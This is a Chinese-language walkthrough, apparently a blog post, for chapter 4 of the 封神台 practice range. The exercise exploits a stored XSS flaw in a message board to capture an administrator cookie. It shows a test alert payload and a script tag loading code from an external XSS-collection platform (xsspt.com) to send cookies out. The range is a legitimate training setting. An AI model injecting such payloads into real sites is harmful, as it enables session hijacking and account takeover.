封神台-安全演练靶场第四章通关方法

Posted mysy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了封神台-安全演练靶场第四章通关方法相关的知识,希望对你有一定的参考价值。

第四章:为了更多的权限!留言板!!【配套课时:cookie伪造目标权限 实战演练】

 技术图片

 

 

说明:从给的tips中可以知道留言板功能存在XSS存储型漏洞,那么首先要建造包含xss攻击语句,可以不用自建xss平台,用网上的xss平台就行:http://xsspt.com/index.php?do=login

 技术图片

 

 

1.首先先去注册,邮箱建议随便写个就行,不要用真实的,注册后,登录系统。

 技术图片

技术图片

 2.然后去创建我的项目,勾选上前两项,然后点击下一步就会创建完成,生成代码。

 技术图片

 

 

 

技术图片

 

 3.去留言板,首先查找出具有xss漏洞的地方,输入<script>alert(‘2019你好‘)</script>,并且提交留言,如果提交后页面能弹窗出内容,那么就说明该处有xss漏洞(此次是主题框具有xss漏洞),然后就可以复制步骤2中生成的xss代码,比如在主题中输入:<script src=http://xsspt.com/l4dvXB></script>,其余内容填写后,提交留言,并且去查看留言。

 技术图片

 

 

 技术图片

 

 4.最后来到xss平台,查看接收到平台模拟的管理员访问记录。

技术图片

 

 

 

以上是关于封神台-安全演练靶场第四章通关方法的主要内容,如果未能解决你的问题,请参考以下文章

封神台靶场:第五章:进击!拿到Web最高权限!配套课时:绕过防护上传木马实战演练

封神台靶场:萌新也能找CMS突破

封神台靶场:模仿公司网站——Cookie注入练习

封神台靶场:辛巴猫舍:SQL注入入门练习

网络安全文件上传靶场通关(1-11关)

[纵横网络靶场社区]工控安全取证